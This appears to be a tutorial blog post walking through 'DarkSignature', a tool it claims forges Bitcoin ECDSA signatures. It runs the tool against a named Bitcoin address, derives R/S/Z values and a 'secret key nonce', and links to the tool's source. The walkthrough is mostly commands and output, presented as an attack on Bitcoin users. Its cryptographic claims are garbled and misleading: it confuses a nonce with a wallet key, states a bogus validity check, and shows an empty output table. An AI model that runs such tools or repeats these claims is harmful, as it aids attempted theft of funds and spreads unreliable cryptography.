DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency


There are many tools available on the internet to create fake signature values ​​in Bitcoin cryptocurrency, one of them is DarkSignature

The basic idea behind DarkSignature is that if there are vulnerabilities in cryptographic algorithms such as ECDSA (Elliptic Curve Digital Signature Algorithm), it is possible to generate invalid or fake signatures that will be accepted as valid by the system.

DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency

This command changes the current directory to  darksignature. This means that all subsequent commands will be executed in this folder. If the necessary scripts or programs for decoding transactions are in it, this will allow them to be used. The command  ls lists all files and directories in the current directory (in this case,  darksignature). This is useful for checking for files or scripts that may be needed for further actions. By default, the command does not show hidden files (those that begin with a dot).

cd darksignature/

DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency

This command changes the permissions of a file or directory  darksignature by adding execute permission ( +x). This is necessary if you want to run the file as a program or script. The sign  ! indicates that the command is being executed in a Jupyter Notebook or similar environment. This command runs an executable file or script named  darksignature, located in the current directory.

!chmod +x darksignature
DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency

This is a command to run a program or script that is likely designed to manipulate Bitcoin digital signatures. The symbol  ! may indicate that the command is being executed in an environment that supports such commands (such as a terminal or console). -address: This is a command line option that tells the program that it is followed by a Bitcoin address. In this case, the address  14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE is a string that is a unique identifier for a Bitcoin wallet. Once run, we get the result of the public key in HEX format.

!./darksignature -address 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency


pubkey: (HEX) = 04ca5606a1e820e7a2f6bb3ab090e8ade7b04a7e0b5909a68dda2744ae3b8ecbfa280a47639c811134d648e8ee8096c33b41611be509ebca837fbda10baaa1eb15

The command  !pip install ecdsa is used to install the library  ecdsa in the Python programming environment. The library  ecdsa provides tools for working with the Elliptic Curve Digital Signature Algorithm (ECDSA). It allows you to create key pairs (private and public), sign messages, and verify signatures. The library allows you to check whether a message was actually signed by a certain key.

!pip install ecdsa
DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency

This code allows you to extract the coordinates of a point on the elliptic curve from a Bitcoin public key. 

from ecdsa import VerifyingKey, SECP256k1 
import binascii 

def get_coordinates_from_pubkey(pubkey_hex): 
    # Convert HEX to bytes 
    pubkey_bytes = binascii.unhexlify(pubkey_hex) 
    # Create a VerifyingKey object from the public key 
    vk = VerifyingKey.from_string(pubkey_bytes, curve=SECP256k1) 
    # Get the Gx and Gy coordinates 
    Gx = vk.pubkey.point.x() 
    Gy = vk.pubkey.point.y() 
    # Convert the coordinates to HEX format 
    Gx_hex = format(Gx, 'x').zfill(64) # Fill with zeros up to 64 characters 
    Gy_hex = format(Gy, 'x').zfill(64) # Fill with zeros up to 64 characters 
    return Gx_hex, Gy_hex 

pubkeyhex = "04ca5606a1e820e7a2f6bb3ab090e8ade7b04a7e0b5909a68dda2744ae3b8ecbfa280a47639c811134d648e8ee8096c33b41611be509ebca837fbda10baaa1eb15" 

Gx, Gy = get_coordinates_from_pubkey(pubkeyhex) 

print(f"pubkey: {pubkeyhex}") 
print(f"(Gx, Gy) = {Gx} {Gy}")
DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency


pubkey: 04ca5606a1e820e7a2f6bb3ab090e8ade7b04a7e0b5909a68dda2744ae3b8ecbfa280a47639c811134d648e8ee8096c33b41611be509ebca837fbda10baaa1eb15

(Gx, Gy) = ca5606a1e820e7a2f6bb3ab090e8ade7b04a7e0b5909a68dda2744ae3b8ecbfa 280a47639c811134d648e8ee8096c33b41611be509ebca837fbda10baaa1eb15

This is the command to run darksignature -pubkey : This is a command line option that tells the program that it is followed by a public key. The public key is used to verify signatures and identify the owner of funds in the Bitcoin network. ca5606a1e820e7a2f6bb3ab090e8ade7b04a7e0b5909a68dda2744ae3b8ecbfa: This is the first part of the command parameters – the coordinate  Gx (x-coordinate) of the public key in hexadecimal format. It is a piece of information about the public key that is needed for cryptographic operations. 280a47639c811134d648e8ee8096c33b41611be509ebca837fbda10baaa1eb15: This is the second part of the command parameters – the coordinate  Gy (y-coordinate) of the public key, also in hexadecimal format. The result is the signature value R, S, Z.

!./darksignature -pubkey ca5606a1e820e7a2f6bb3ab090e8ade7b04a7e0b5909a68dda2744ae3b8ecbfa 280a47639c811134d648e8ee8096c33b41611be509ebca837fbda10baaa1eb15
DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency


pubkey: (Gx , Gy) = (91519190036866233587583752863966343541024156557754641198598352460350806215674, 18110675123485594228049867696927871008716109164646265340106239137304742587157)
|===|================ Get ECDSA Signature: <R> value ================|================ Get ECDSA Signature: <S> value ================|================ Get ECDSA Signature: <Z> value ================|===|

This command writes to a file: Instead of displaying the text on the screen, it will be written to a file  SignRSZ.txt. If this file does not exist before, it will be created.

!echo '1111,dc2e5e1104d74ace769d2c51901b6a6237c723a56aa4a295ea37ad826d0ddfbb,4785af2aeff25512213694d4cd1fe85ca21606cce8e43f34799d4af3b1cdf2b2,18a00b1802ee4d717ced01a782f89f509a2fac59376e1de4bde0c7f448869455,0000' > SignRSZ.txt
DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency

Run the calculatenonce.py script to get the Secret Key NONCE value in HEX format

!python calculatenonce.py
DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency


Secret Key  NONCE:  db7bbcb93e3fb5259c5035c6321134b60b8b5afb37cff08641ce3ebbf8e1a95c
Signatere R value:  dc2e5e1104d74ace769d2c51901b6a6237c723a56aa4a295ea37ad826d0ddfbb

Secret Key NONCE

Secret Key  (NONCE) is a value in cryptography that is used to encrypt and sign data. In the context of Bitcoin, the secret key allows the user to control their BTC coins .

Let’s run the command to get the public key for the secret key value (NONCE)

!./darksignature -privkey db7bbcb93e3fb5259c5035c6321134b60b8b5afb37cff08641ce3ebbf8e1a95c
DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency


pubkey: (HEX) = 04dc2e5e1104d74ace769d2c51901b6a6237c723a56aa4a295ea37ad826d0ddfbb384139c65187ffece2e0c880f013cb69ede7d9078ef6c68d1eafbec50ec05502

Signatere R value & pubkey: (HEX)

Let’s check if the R value of the signature and the Gx coordinate of the public key are the same, then the Bitcoin transaction signature is valid.

DarkSignature is a tool for creating fake signature values ​​in Bitcoin cryptocurrency



The DarkSignature tool is a powerful tool for creating fake signature values ​​in the Bitcoin cryptocurrency by exploiting vulnerabilities in cryptographic algorithms such as ECDSA. DarkSignature can generate invalid signatures that can be accepted as valid by the system, posing serious threats to user security and network integrity. When using DarkSignature, users can modify directories, install necessary libraries, and extract public key coordinates, allowing them to manipulate digital signatures. These actions highlight the importance of carefully checking and protecting the cryptographic mechanisms used in Bitcoin and other cryptocurrencies. Understanding how tools like DarkSignature work helps raise awareness of potential risks and vulnerabilities in the system, which is essential for ensuring security in the world of digital currencies.

Source code: https://github.com/smartibase/Broadcast-Bitcoin-Transaction/tree/main/darksignature